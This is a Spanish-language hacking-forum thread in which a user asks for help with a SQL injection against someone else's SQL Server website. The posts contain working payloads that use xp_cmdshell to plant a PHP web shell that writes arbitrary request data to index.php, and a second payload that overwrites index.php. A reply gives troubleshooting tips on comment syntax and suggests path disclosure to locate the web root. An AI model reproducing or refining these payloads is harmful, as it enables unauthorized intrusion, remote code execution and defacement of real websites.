Foro de elhacker.net

hola

yo queria atravez de sql server , de una iyneccion en las bases de datos de una web
que corre por sql server
queria subirle un archivo ,pero , me pueden corregir el codigo,no lo sube y lo vi varias veces.


'';exec master..xp_cmdshell 'echo ^<? $d=fopen("index.php","w");$s=$_REQUEST["variable"];fputs($d,$s);fclose($d); ?^>  > C:\AppServ\www\update.php'--

Queria subir el archivo update,con el siguiente codigo .

Gracias de antemano

el individuo usa appserver

y para que quieres modificar el index.php desde update.php si puedes hacerlo directamente desde el exec que invocaste en la query?.

Si no te funciona talves tengan deshabilitada esa función o el directorio se encuentre a modo solo de lectura creado por un administrador, en ese caso no podrías sobreescribir archivos y por politicas de seguridad de win tampoco crear usuarios nt.

También recuerda que no es lo mismo "--" a decir " -- " ya que '-- no existe ni te lo va a reconocer el servidor sql, debes dejar un espacio en blanco antes y despues de las lineas de comentario.

Problema solucionado , gracias otra vez WHK.

como?

Claro, ahora estaba viendo de modificar el index.php, desde exec.


''exec master.xp_cmdshell 'echo hola  ^> C:\AppServ\www\index.php' --

si el servidor acepta " exec " y el index.php se ubique en la ruta especificada , funcionaria?

C:\AppServ\www\index.php

si, para eso existe lo que se llama path disclosure
http://foro.elhacker.net/nivel_web/diccionario_informatico_sobre_bugs_y_exploits_en_nivel_web_v10-t264007.0.html
lo scas tratando de forzar algún error o algo que te pueda servir.